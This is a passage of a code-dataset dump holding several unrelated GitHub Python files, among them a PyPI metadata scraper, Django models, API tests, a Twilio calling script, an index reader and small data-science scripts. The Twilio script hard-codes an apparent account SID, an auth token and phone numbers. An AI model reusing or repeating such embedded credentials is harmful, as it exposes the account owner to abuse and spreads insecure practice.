specifier_from_requires_dist(req).replace(\n req_no_specifiers + \" \", \"\", 1\n )\n if extras:\n for extra in extras:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO deps (\n package_name,\n dep_name,\n dep_specifier,\n extra\n ) VALUES (?, ?, ?, ?);\n \"\"\",\n (package, req_no_specifiers, specifier, extra),\n )\n else:\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO deps (\n package_name,\n dep_name,\n dep_specifier\n ) VALUES (?, ?, ?);\n \"\"\",\n (package, req_no_specifiers, specifier),\n )\n\n requires_dist[\"dists\"] = sorted(set(requires_dist[\"dists\"]))\n for extra, extra_info in list(requires_extras.items()):\n requires_extras[extra][\"dists\"] = sorted(set(extra_info[\"dists\"]))\n\n for relv, dls in resp[\"releases\"].items():\n for download in dls:\n if download[\"yanked\"]:\n yanked.append(relv)\n break\n\n yanked = sorted_versions(set(yanked))\n if yanked:\n db.execute(\n \"UPDATE packages SET yanked=1 WHERE name=? AND version=?;\",\n (package, str_version),\n )\n\n for check_name, check_score in scorecard_checks.items():\n db.execute(\n \"\"\"\n INSERT OR IGNORE INTO scorecard_checks (\n package_name,\n name,\n score\n ) VALUES (?, ?, ?);\n \"\"\",\n (package, check_name, check_score),\n )\n\n return package\n\n\ndef filter_packages(pkgs):\n # Check to see if we already have this package or not.\n packages_to_process = []\n with locked_db() as db:\n with closing(db.cursor()) as cur:\n for pkg in pkgs:\n cur.execute(\n \"SELECT name FROM packages WHERE name = ? LIMIT 1;\",\n (pkg,),\n )\n if cur.fetchone():\n continue\n packages_to_process.append(pkg)\n return packages_to_process\n\n\ndef parse_project_url(url):\n try:\n parsed = parse_url(url)\n if not parsed.host or parsed.host == \"pypi.org\":\n return None\n if not str(parsed).startswith(\"http\"):\n return None\n return parsed\n except Exception:\n return None\n\n\ndef update_data_from_pypi():\n filtered = filter_packages(packages)\n results = pool.map(update_data_for_package, filtered)\n for _ in tqdm(results, total=len(filtered), unit=\"packages\"):\n pass\n\n\ndef get_google_assured_oss_packages(http: urllib3.PoolManager) -> set[str]:\n resp = http.request(\"GET\", \"https://cloud.google.com/assured-open-source-software/docs/supported-packages\")\n data = resp.data.decode(\"utf-8\")\n\n # Start after the Python heading, then look for first list.\n data = data[data.find(\"

\")\n end = data.find(\"\")\n return {x.lower() for x in re.findall(r\"
  • ([^<]+)
  • \", data[start:end])}\n\n\nif __name__ == \"__main__\":\n base_dir = os.path.dirname((os.path.abspath(__file__)))\n http = urllib3.PoolManager(\n block=True,\n strict=True,\n maxsize=MAX_WORKERS,\n headers=urllib3.util.make_headers(\n keep_alive=True,\n accept_encoding=True,\n user_agent=\"sethmlarson/pypi-data\",\n ),\n retries=urllib3.util.Retry(\n status=10, backoff_factor=0.5, status_forcelist=list(range(500, 600))\n ),\n )\n wheel_re = re.compile(r\"-([^\\-]+-[^\\-]+-[^\\-]+)\\.whl$\")\n\n GOOGLE_ASSURED_OSS_PACKAGES = get_google_assured_oss_packages(http)\n\n tmp_dir = tempfile.mkdtemp()\n os.system(f\"virtualenv {tmp_dir}/venv > /dev/null\")\n venv_python = os.path.join(tmp_dir, \"venv/bin/python\")\n\n pypi_deps_db = os.path.join(base_dir, \"pypi.db\")\n\n downloads = {}\n resp = http.request(\"GET\", DOWNLOADS_URL)\n assert resp.status == 200\n for row in resp.json()[\"rows\"]:\n downloads[row[\"project\"]] = row[\"download_count\"]\n\n _DB = sqlite3.connect(os.path.join(base_dir, \"pypi.db\"), check_same_thread=False)\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS packages (\n name TEXT,\n version TEXT,\n requires_python TEXT,\n yanked BOOLEAN DEFAULT 0,\n has_binary_wheel BOOLEAN,\n has_vulnerabilities BOOLEAN,\n first_uploaded_at TIMESTAMP,\n last_uploaded_at TIMESTAMP,\n recorded_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n downloads INTEGER,\n scorecard_overall FLOAT,\n in_google_assured_oss BOOLEAN,\n PRIMARY KEY (name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS deps (\n package_name TEXT,\n version TEXT,\n dep_name TEXT,\n dep_specifier TEXT,\n extra TEXT DEFAULT NULL,\n PRIMARY KEY (package_name, version, dep_name, dep_specifier),\n FOREIGN KEY (package_name) REFERENCES packages(name),\n FOREIGN KEY (dep_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS wheels (\n package_name TEXT,\n version TEXT,\n filename TEXT,\n build TEXT,\n python TEXT,\n abi TEXT,\n platform TEXT,\n uploaded_at TIMESTAMP,\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS maintainers (\n name TEXT,\n package_name TEXT,\n PRIMARY KEY (name, package_name),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS package_urls (\n package_name TEXT,\n name TEXT,\n url TEXT,\n public_suffix TEXT,\n PRIMARY KEY (package_name, url),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS scorecard_checks (\n package_name TEXT,\n name TEXT,\n score INTEGER,\n PRIMARY KEY (package_name, name),\n FOREIGN KEY (package_name) REFERENCES packages(name)\n );\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE INDEX IF NOT EXISTS idx_packages_name ON packages (name);\n \"\"\"\n )\n _DB.execute(\n \"\"\"\n CREATE INDEX IF NOT EXISTS idx_packages_urls_public_suffix ON package_urls (public_suffix);\n \"\"\"\n )\n _DB.commit()\n db_lock = threading.Lock()\n pool = ThreadPoolExecutor(max_workers=MAX_WORKERS)\n\n packages = get_all_package_names()\n\n update_data_from_pypi()\n","repo_name":"sethmlarson/pypi-data","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17342,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"40"} +{"seq_id":"11437116963","text":"from django.db import models\r\nfrom accounts.models import Profile\r\nfrom doctors.models import Doctor\r\nfrom volunteers.models import Volunteer\r\n\r\n\r\n# via doctor\r\nclass Radiology(models.Model):\r\n x_ray = models.ImageField(null=True, blank=True, default=None)\r\n\r\n def get_xray(self):\r\n return self.x_ray\r\n\r\n\r\nclass Patient(Profile, models.Model):\r\n doctorp = models.ForeignKey(\r\n Doctor, on_delete=models.PROTECT, related_name='doctor_patient')\r\n # via doctor assign one V one to many\r\n volunteerp = models.ForeignKey(\r\n Volunteer, on_delete=models.PROTECT, default=None, null=True, blank=True)\r\n\r\n carername = models.CharField(max_length=25)\r\n carerphonenumber = models.CharField(max_length=12)\r\n careremail = models.EmailField()\r\n x_ray = models.ForeignKey(Radiology, on_delete=models.CASCADE, null=True, blank=True, default=None)\r\n","repo_name":"DevMed22/Revive_My_Memory","sub_path":"backend/patients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3941238280","text":"__copyright__ = \"Copyright 2019 - 2021 Richard Kemp\"\n__revision__ = \"$Id: 8dafaefe7c4f1ccca73df23d660c22a8ea2caed1 $\"\n\nfrom datetime import datetime\n\nfrom mercury import Timeframe, Timeseries\n\nfrom mercury.extras.datasources.alphavantage import Datasource\n\nfrom pandas import DataFrame\n\nimport pytest\n\n# API_KEY = os.environ['ALPHAVANTAGE_API_KEY']\nAPI_KEY = 'TEST'\n\n\n@pytest.fixture\ndef datasource():\n return Datasource(API_KEY)\n\n\nclass TestInstanciation():\n def test_valid_key(self, datasource):\n assert datasource\n\n\nclass TestGetMethod():\n @pytest.mark.online\n def test_invalid_interval(self, datasource):\n with pytest.raises(ValueError) as error:\n assert datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2017, 12, 15, 23, 00, 00),\n instrument=\"MSFT\",\n timeframe=Timeframe.H4)\n message = str(error.value)\n assert message == \"H4 interval not supported\"\n\n @pytest.mark.online\n def test_intraday_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.M5\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_daily_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.D1\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_weekly_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.W1\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n\n @pytest.mark.online\n def test_monthly_data(self, datasource):\n instrument = \"MSFT\"\n timeframe = Timeframe.MN\n ts = datasource.get_timeseries(\n from_date=datetime(2019, 12, 1, 9, 00, 00),\n to_date=datetime(2019, 12, 15, 23, 00, 00),\n instrument=instrument,\n timeframe=timeframe)\n assert isinstance(ts, Timeseries)\n assert ts.instrument is instrument\n assert ts.timeframe is timeframe\n assert isinstance(ts.data, DataFrame)\n","repo_name":"materya/mercury","sub_path":"test/integration/test_datasource_alphavantage.py","file_name":"test_datasource_alphavantage.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22310578556","text":"from twilio.rest import TwilioRestClient\n\naccount = \"ACe1eb373d270917b737deaedb1ecda797\"\ntoken = \"c4909e963577d964791ef521a1195fb1\"\nprint(\"Setting up client\")\nclient = TwilioRestClient(account, token)\n\nprint(\"Trying to make a call\")\ncall = client.calls.create(to=\"447933144812\",\n from_=\"441163260756\",\n url=\"https://demo.twilio.com/welcome/voice/\")\nprint(call.sid)\n","repo_name":"CFGLondon/team-8","sub_path":"fitbit/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20211471873","text":"class Solution:\n def countAnagrams(self, s: str) -> int:\n mole, deno = 1, 1\n MOD = 10 ** 9 + 7\n for w in s.split():\n cnt = Counter()\n for i, c in enumerate(w):\n cnt[c] += 1\n mole = mole * (i + 1) % MOD\n deno = deno * cnt[c] % MOD\n return mole * pow(deno, -1, MOD) % MOD\n\n","repo_name":"Yescafe/leetcode-solutions","sub_path":"biweekly/094/6276.py","file_name":"6276.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"19320659616","text":"import os\nfrom io import BytesIO\n\nBLOCK_LEN = 102\n\n\nclass IndexReader:\n\n def __init__(self, dir):\n\n self.index_directory = dir\n\n # method that gets the pointer first word of the block in the dictionary's string and the pointer of the block itself,\n # returns a dictionary of all words in a block and their frequencies\n def get_block_words(self, index, pointer, strSize, curr_blk, blocks_amount):\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n next_block = pointer + BLOCK_LEN\n f.seek(next_block + 8)\n first_next_block_ptr_to_file = int.from_bytes(f.read(4),\n byteorder='big') # skip 4 of pointer to block in string + 4 of freq\n f.seek(next_block)\n str_next_block = int.from_bytes(f.read(4),\n byteorder='big') + 4 # get the pointer to the next block in string\n dict_freq = {}\n for i in range(10):\n if i == 0: # in case of first word in block\n pointer += 4 # skip the 4 bytes represent the length of the string\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big') # read the frequency\n pointer += 4\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big') # read the pointer in the ancoded file\n pointer += 4\n word_length = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n index += 4\n f.seek(index)\n word = f.read(word_length).decode('ascii')\n index += word_length\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file) # save the pointer in the encoded file\n prev_word = word # save as previous word\n elif i < 9: # words 2-9 in the block\n if curr_blk == blocks_amount: # in case this is the last block\n f.seek(pointer + 9)\n check = int.from_bytes(f.read(4), byteorder='big') # check if there are more words in the block\n if check == 0: # in case not, skip\n continue\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n length = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n prefix = int.from_bytes(f.read(1), byteorder='big') # read the prefix\n pointer += 1\n word = prev_word[:prefix] # get the common characters from the previous word\n to_read = length - prefix\n f.seek(index)\n word += f.read(to_read).decode('ascii') # read the non-common and decode\n dict_freq[prev_word].append(ptr_to_file) # save the freq of the previous word\n prev_word = word\n index += to_read\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file) # save the id of the review\n else: # in case this is the last word on block\n f.seek(pointer)\n freq = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n if curr_blk == blocks_amount: # in case this is the last block\n length = strSize - index\n else:\n length = str_next_block - index\n\n ptr_to_file = int.from_bytes(f.read(4), byteorder='big')\n pointer += 4\n prefix = int.from_bytes(f.read(1), byteorder='big')\n pointer += 1\n word = prev_word[:prefix]\n to_read = length\n f.seek(index)\n word += f.read(to_read).decode('ascii')\n dict_freq[prev_word].append(ptr_to_file)\n prev_word = word\n index += to_read\n dict_freq[word] = [freq]\n dict_freq[word].append(ptr_to_file)\n if first_next_block_ptr_to_file != 0: # in casse there are more blocks\n dict_freq[word].append(first_next_block_ptr_to_file)\n else:\n file_size = os.path.getsize(self.index_directory + \"/text.pl\")\n dict_freq[word].append(file_size)\n\n return dict_freq\n\n def decode(self, stream): # decode bytes to int\n\n move = 0\n result = 0\n while True:\n i = self.read_one_byte(stream)\n result |= (i & 0x7f) << move\n move += 7\n if not (i & 0x80):\n break\n\n return result\n\n def decodeFromBytes(self, buf): # decode all bytes to one int\n\n return self.decode(BytesIO(buf))\n\n def read_one_byte(self, stream):\n\n c = stream.read(1)\n if c == b'':\n raise EOFError(\"Unexpected EOF while reading bytes\")\n return ord(c)\n\n def getTokenFrequency(self, token): # get frequency of the given word\n\n file_size = os.path.getsize(self.index_directory + \"/text.dic\")\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n string_size = int.from_bytes(f.read(4), byteorder='big')\n blocks_num = (file_size - string_size - 4) // BLOCK_LEN # calculate the amount of blocks\n first_block_ptr = 4 + string_size # skip the first 4 bytes represent the length of the string\n\n right = blocks_num # last block\n left = 0\n\n while left <= right: # binary search in blocks\n curr_block = ((left + right) // 2)\n mid = ((\n left + right) // 2) * BLOCK_LEN + first_block_ptr # pointer of the middle block in the dictionary\n f.seek(mid)\n middle_ptr = int.from_bytes(f.read(4), byteorder='big') # pointer to the middle block in the string\n dict_words_in_block = self.get_block_words(middle_ptr, mid, string_size + 4, curr_block,\n blocks_num - 1) # get dictionary of the words in the block\n if token in dict_words_in_block:\n return dict_words_in_block[token][0]\n if token > list(dict_words_in_block.keys())[\n 0]: # compare it to the first word in the block (alphabetically)\n left = (left + right) // 2 + 1\n else:\n right = (left + right) // 2 - 1\n\n return 0\n\n def getNumberOfReviews(self): # get the amount of reviews in the file\n\n with open(self.index_directory + \"/reviews_and_words.txt\", \"r\") as f:\n lines = f.readlines()\n return lines[0]\n\n def getTokenSizeOfReviews(self): #\n\n with open(self.index_directory + \"/reviews_and_words.txt\", \"r\") as f:\n lines = f.readlines()\n return lines[1]\n\n def getReviewsWithToken(self, token): # get the amount of reviews contain that token\n\n file_size = os.path.getsize(self.index_directory + \"/text.dic\")\n with open(self.index_directory + \"/text.dic\", \"rb\") as f:\n string_size = int.from_bytes(f.read(4), byteorder='big')\n blocks_num = (file_size - string_size - 4) // BLOCK_LEN # calculate the amount of blocks\n first_block_ptr = 4 + string_size # skip the first 4 bytes represent the length of the string\n\n right = blocks_num # last block\n left = 0\n\n reviews = list()\n while left <= right: # binary search in blocks\n curr_block = ((left + right) // 2)\n mid = ((\n left + right) // 2) * BLOCK_LEN + first_block_ptr # pointer of the middle block in the dictionary\n f.seek(mid)\n middle_ptr = int.from_bytes(f.read(4), byteorder='big') # pointer to the middle block in the string\n dict_ptr_to_file = self.get_block_words(middle_ptr, mid, string_size + 4, curr_block,\n blocks_num - 1) # get dictionary of the words in the block\n if token in dict_ptr_to_file:\n file_ptr = dict_ptr_to_file[token][1] # get the id of the review\n toRead = dict_ptr_to_file[token][2] - file_ptr # get the length by calculating the next pointer\n with open(self.index_directory + \"/text.pl\", \"rb\") as file:\n file.seek(file_ptr)\n byte_count = 0\n while byte_count < toRead:\n coded = file.read(1)\n byte_count += 1\n copy = coded\n decoded = int.from_bytes(coded, byteorder='big')\n while (\n decoded & 0x80 == 0x80) and byte_count < toRead: # in case the byte starts with '1', more bytes to read\n coded = file.read(1)\n copy += coded\n byte_count += 1\n decoded = int.from_bytes(coded, byteorder='big')\n\n reviews.append(self.decodeFromBytes(copy)) # save the review's id\n for i in range(len(reviews)):\n if i > 1 and i % 2 == 0: # calculate the pointers from the differences from each other\n reviews[i] += reviews[i - 2]\n\n return tuple(reviews)\n if token > list(dict_ptr_to_file.keys())[\n 0]: # compare it to the first word in the block (alphabetically)\n left = (left + right) // 2 + 1\n else:\n right = (left + right) // 2 - 1\n\n return tuple(reviews)\n\n def getTokenCollectionFrequency(self, token): # return the amount of times the token shows in all the reviews\n\n total_freq = 0\n list_of_token = self.getReviewsWithToken(token)\n for i in range(len(list_of_token)): # go over all the reviews of the given token\n if i % 2 != 0: # odd places holds the frequences\n total_freq += list_of_token[i] # sum\n\n return total_freq\n","repo_name":"DanielYona1/Projects","sub_path":"Information-Retrieval/IndexReader.py","file_name":"IndexReader.py","file_ext":"py","file_size_in_byte":10790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21424992746","text":"from random import randint\ncont = 0\nprint('Sou seu computador...\\nAcabei de pensar em número de 0 a 10.\\nConsegue adivinha-lo??')\npc: int = randint(0, 10) #randint não ignora o ultimo valor\nacertou = False\nwhile not acertou:\n j = int(input('Qual é o seu palpite? '))\n cont = cont + 1\n if j == pc:\n acertou = True\n else:\n if j > pc:\n print('MENOS! Tente novamente.')\n else:\n print('MAIS! Tente novamente.')\n print('='*25)\nif cont == 0:\n print('WOW! Acertou de primeira! Parabéns!')\nelif cont == 1:\n print('Acertou! Foram somente {} tentativas para acertar.'.format(cont))\nelse:\n print('Finalmente acertou! Foram {} tentativas para acertar.'.format(cont))\n","repo_name":"gabrielraeder/Python","sub_path":"Scripts PYTHON/PycharmProjects/pythonExercicios/Mundo 02/Aula14/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34062427135","text":"import csv\r\nimport numpy\r\nimport random\r\nfrom sksurv.linear_model import CoxnetSurvivalAnalysis\r\nfrom sksurv.nonparametric import kaplan_meier_estimator\r\nfrom sksurv.linear_model import CoxPHSurvivalAnalysis\r\nfrom sksurv.metrics import concordance_index_censored\r\nfrom sklearn.model_selection import GridSearchCV\r\nimport matplotlib.pyplot as plt;\r\n\r\n\r\n# converts cells to floats, empty cells become 0\r\ndef convertToFloat(x):\r\n if x == '' or x == '-':\r\n return 0\r\n else:\r\n return float(x)\r\n\r\ndef split_for_kaplan(labels, vars, id):\r\n event = [[],[]];\r\n time = [[],[]];\r\n for i in range(0, len(labels)):\r\n event[int(vars[i][id])].append(labels[i][0])\r\n time[int(vars[i][id])].append(labels[i][1])\r\n return (event, time);\r\n\r\n# open data\r\nf = open('base_diabete_lasso.csv', 'r')\r\n# create reader\r\nreader = csv.reader(f, delimiter=';')\r\n# skip the first line because it has only labels\r\nheader = next(reader)\r\n\r\n# create a list for all features\r\ndata = []\r\n# create a list for labels (got sick or not)\r\nlabel = []\r\n\r\n# for every row in the data\r\nfor row in reader:\r\n # convert every feature cell\r\n data.append(numpy.array(list(map(convertToFloat, row[2:len(row)]))))\r\n # get the label and add it to the label list\r\n label.append(('1' == row[0], convertToFloat(row[1])))\r\n\r\n# transform label data to required format\r\n\r\nd = list(zip(data, label));\r\n\r\ndiabetic = []\r\nnon_diabetic = []\r\n\r\nfor val in d:\r\n if(val[0][0]):\r\n diabetic.append(val);\r\n else:\r\n non_diabetic.append(val);\r\n \r\n\r\n# shuffle data\r\nrandom.shuffle(diabetic);\r\nrandom.shuffle(non_diabetic);\r\n\r\n# split data and labels\r\ntrain_data = diabetic[0:int(0.66 * len(diabetic))] + non_diabetic[0:int(0.66 * len(non_diabetic))];\r\ntest_data = diabetic[int(0.66 * len(diabetic)) : len(diabetic)] + non_diabetic[int(0.66 * len(non_diabetic)) : len(non_diabetic)];\r\n\r\n_train_d, _train_l = zip(*train_data);\r\n_test_d, _test_l = zip(*test_data);\r\n\r\n_train_d = list(_train_d)\r\n_test_d = list(_test_d)\r\n\r\n# plot some lame estimator stuff\r\n_event, _time = split_for_kaplan(_train_l, _train_d, 2)\r\n\r\nfor i in range(0, len(_event)):\r\n x, y = kaplan_meier_estimator(_event[i], _time[i])\r\n plt.step(x, y, where=\"post\", label=str(i));\r\n\r\nplt.legend();\r\n\r\nplt.plot();\r\n\r\n_train_l = numpy.array(list(_train_l), dtype='bool,f4');\r\n\r\n_test_l = numpy.array(list(_test_l), dtype='bool,f4');\r\n\r\n# create ph model\r\nestimator = CoxPHSurvivalAnalysis();\r\n\r\nestimator.fit(_train_d, _train_l)\r\n\r\n# create the cox model\r\nclf = CoxnetSurvivalAnalysis(n_alphas=5, tol=0.1)\r\n\r\n# train model \r\nclf.fit(_train_d, _train_l);\r\n\r\nresult = [];\r\n# evaluate for every alpha\r\nfor v in clf.alphas_:\r\n res = clf.predict(_test_d, alpha=[v])\r\n result.append(concordance_index_censored(tft, timet, res))\r\n\r\n\r\n\r\n# calculate precision\r\nclf.predict(_test_d);\r\nres= clf.predict(_test_d);\r\n\r\n\r\n# print out some results\r\nprint(clf.coef_)\r\nprint(res)\r\n# save coeficientos\r\n\r\n#numpy.savetxt(\"coefsWithLabels.txt\", list(map(lambda x : [str(x[0]),str(x[1])], zip(clf.coef_, header[2:len(header)]))), fmt=\"%s\")\r\n#numpy.savetxt(\"res.txt\", list(map(lambda x : [str(x[0]),str(x[1])], zip(clf.predict(test_data), header[2:len(header)]))), fmt=\"%s\")\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"holgus103/SurvivalAnalysis","sub_path":"testmodel.py","file_name":"testmodel.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42762739935","text":"import numpy\nimport copy\n\nclass ChromosomeLocationBitArrays( object ):\n\n def __init__( self, dicts=None, fname=None ):\n # If dicts parameter provided, use to initialize\n if dicts is not None:\n arrays = dicts\n else:\n arrays = {}\n sizes={}\n \n \n # If fname parameter provided, initialize from file\n if fname is not None: \n for line in open( fname ):\n fields = line.split()\n name = fields[0]\n size = int( fields[1] )\n arrays[name] = numpy.zeros( size, dtype=bool )\n self.arrays = arrays\n\n\n def set_bits_from_file( self, fname ):\n for line in open( fname ):\n fields = line.split()\n # Parse fields\n chrom = fields[0]\n start = int( fields[1] )\n end = int( fields[2] )\n self.arrays[ chrom ][ start : end ] = 1\n \n \n \n def Chrom_Start_End( self, fname ):\n map=[]\n \n for line in open( fname ):\n fields = line.split()\n # Parse fields\n chrom = fields[0]\n start = int( fields[1] )\n end = int( fields[2] )\n map.append([ chrom, start, end ])\n \n self.map=map\n #return map\n \n \n \n \n \n#__________________________________________________________________ \n def compare(self,A, B, C):\n comp=[0,0,0,0,0,0,0] # (A,B,AB,C,AC,BC,ABC)\n \n\n\n\n for line in range (0, len(A.map)):\n chromosome=A.map[line][0]\n start=A.map[line][1]\n end=A.map[line][2]\n\n slB=B.arrays[chromosome][start:end]\n slC=C.arrays[chromosome][start:end]\n\n if slB.any()==False and slC.any()==False:\n comp[0]+=1\n\n if slB.any()==True and slC.any()==True:\n comp[6]+=1\n\n if slB.any()==True and slC.any()==False:\n comp[2]+=1\n\n if slB.any()==False and slC.any()==True:\n comp[4]+=1\n \n \n \n \n for line in range (0, len(B.map)):\n chromosome=B.map[line][0]\n start=B.map[line][1]\n end=B.map[line][2]\n\n slA=A.arrays[chromosome][start:end]\n slC=C.arrays[chromosome][start:end]\n\n if slA.any()==False and slC.any()==False:\n comp[1]+=1\n\n if slA.any()==True and slC.any()==True:\n comp[6]+=1\n\n if slA.any()==True and slC.any()==False:\n comp[2]+=1\n\n if slA.any()==False and slC.any()==True:\n comp[5]+=1\n \n \n for line in range (0, len(C.map)):\n chromosome=C.map[line][0]\n start=C.map[line][1]\n end=C.map[line][2]\n\n slB=B.arrays[chromosome][start:end]\n slA=A.arrays[chromosome][start:end]\n\n if slB.any()==False and slA.any()==False:\n comp[3]+=1\n\n if slB.any()==True and slA.any()==True:\n comp[6]+=1\n\n if slB.any()==True and slA.any()==False:\n comp[5]+=1\n\n if slB.any()==False and slA.any()==True:\n comp[4]+=1\n\n\n return comp\n \n\n\n \n\n#__________________________________________________________________ \n\n\n \n \n def intersect( self, other ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = self.arrays[chrom] & other.arrays[chrom]\n return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n def union( self, other ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = self.arrays[chrom] | other.arrays[chrom]\n return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n \n def complement( self ):\n rval = {}\n for chrom in self.arrays:\n rval[chrom] = ~ self.arrays[chrom]\n return ChromosomeLocationBitArrays( dicts=rval )\n \n \n \n \n \n def copy( self ):\n return ChromosomeLocationBitArrays( \n dicts=copy.deepcopy( self.arrays ) )\n \n \n \n \n ","repo_name":"ursky/qbb2015-homework","sub_path":"day4/homework/chrombits.py","file_name":"chrombits.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22683953164","text":"import argparse\nimport numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(\n description=\"Decision Tree Regressor.\"\n)\nparser.add_argument(\n 'filename', type=str, help='Filename with numeric data stored in tuples (x, y).'\n)\n\n\ndef find_parameters(X: np.ndarray, y: np.ndarray) -> tuple:\n dec_tree_regression = DecisionTreeRegressor(max_depth=1, max_leaf_nodes=2, criterion='squared_error')\n dec_tree_regression.fit(X, y)\n\n X_test = np.arange(0.0, 5.0, 0.01)[:, np.newaxis]\n y_1 = dec_tree_regression.predict(X_test)\n\n c = dec_tree_regression.tree_.threshold[0]\n a = dec_tree_regression.tree_.value[1][0]\n b = dec_tree_regression.tree_.value[2][0]\n\n text_representation = tree.export_text(dec_tree_regression, feature_names=['x'])\n print(text_representation)\n\n plt.figure()\n plt.scatter(X, y, s=20, edgecolor=\"black\", c=\"blue\", label=\"data\")\n plt.plot(X_test, y_1, color=\"red\", linewidth=2)\n plt.xlabel(\"data\")\n plt.ylabel(\"target\")\n plt.title(\"Дерево решений в применении к регрессии\")\n plt.savefig('plot.png')\n\n return c, a, b\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n filename = args.filename\n\n X = list()\n y = list()\n\n with open(filename, 'r') as file:\n for line in file:\n line = line.split(',')\n X.append(float(line[0]))\n y.append(float(line[1]))\n\n X = np.array(X).reshape(-1, 1)\n y = np.array(y).ravel()\n\n c, a, b = find_parameters(X, y)\n\n print(f'c = {c}, a = {a[0]}, b = {b[0]}')\n","repo_name":"crazy-historian/go_ahead_test_task","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34802083140","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Float32MultiArray, String, Int16\nimport os\nimport pigpio\n\n#define the pin of RPi\ntouch_l_pin = 5\ntouch_b_pin = 12\ntouch_r_pin = 13\nlight_pin_d = 19\nlight_pin_a = 26 #can't read \n\n#define threshold value of light sensor\nthreshold = 20\n#initialize pinmode of rpi and give it a check\npi = pigpio.pi()\nif not pi.connected:\n exit()\n\npi.set_mode(touch_r_pin, pigpio.OUTPUT)\npi.set_mode(touch_l_pin, pigpio.OUTPUT)\npi.set_mode(touch_b_pin, pigpio.OUTPUT)\npi.set_mode(light_pin_d, pigpio.INPUT)\npi.set_mode(light_pin_a, pigpio.INPUT)\n\nrospy.init_node('sensor', anonymous=True) #node \npub_touch_sensor = rospy.Publisher('touch_sensor', Float32MultiArray, queue_size=10) #topic name\npub_light = rospy.Publisher('light_sensor', Int16, queue_size=10) #topic name\n#pub_state = 